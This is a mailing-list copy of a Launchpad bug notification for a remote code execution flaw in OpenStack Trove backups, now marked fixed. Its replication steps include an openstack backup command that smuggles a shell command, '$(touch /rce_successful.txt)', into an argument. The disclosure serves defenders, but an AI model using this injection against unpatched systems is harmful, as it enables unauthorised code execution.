[Bug 2028680] Re: Remote code execution: Trove backup
Marc Deslauriers
2028680 at bugs.launchpad.net
Tue Jul 25 16:51:55 UTC 2023
https://ubuntu.com/security/notices/USN-6245-1
** Changed in: openstack-trove (Ubuntu Jammy)
Status: Triaged => Fix Released
--
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to openstack-trove in Ubuntu.
https://bugs.launchpad.net/bugs/2028680
Title:
Remote code execution: Trove backup
Status in openstack-trove package in Ubuntu:
Fix Released
Status in openstack-trove source package in Jammy:
Fix Released
Status in openstack-trove source package in Lunar:
Fix Released
Status in openstack-trove source package in Mantic:
Fix Released
Bug description:
Note: Details taken from
https://storyboard.openstack.org/#!/story/2010004
An external security audit by Adam Bell, CyberCX New Zealand
(conducted for Catalyst Cloud) has identified a Remote Code Execution
security issue in Trove.
During a Trove instance backup command, it is possible to pass through
extra arguments via guestagent to docker, and utilize a subprocess
shell within backup python code to perform a Remote Code Execution
within the Trove backup container.
Replication steps:
1) Create mysql database instance.
2) Issue a backup command using the following: $ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful.txt)"' backup-name1
Validation of the RCE can be observed from within the Trove VM:
root at rce-db1:~# docker cp db_backup:/rce_successful.txt .
root at rce-db1:~# ls -l rce_successful.txt
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt
The executed touch command above can be replaced with any shell
actions, including apt.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openstack-trove/+bug/2028680/+subscriptions
More information about the Ubuntu-openstack-bugs
mailing list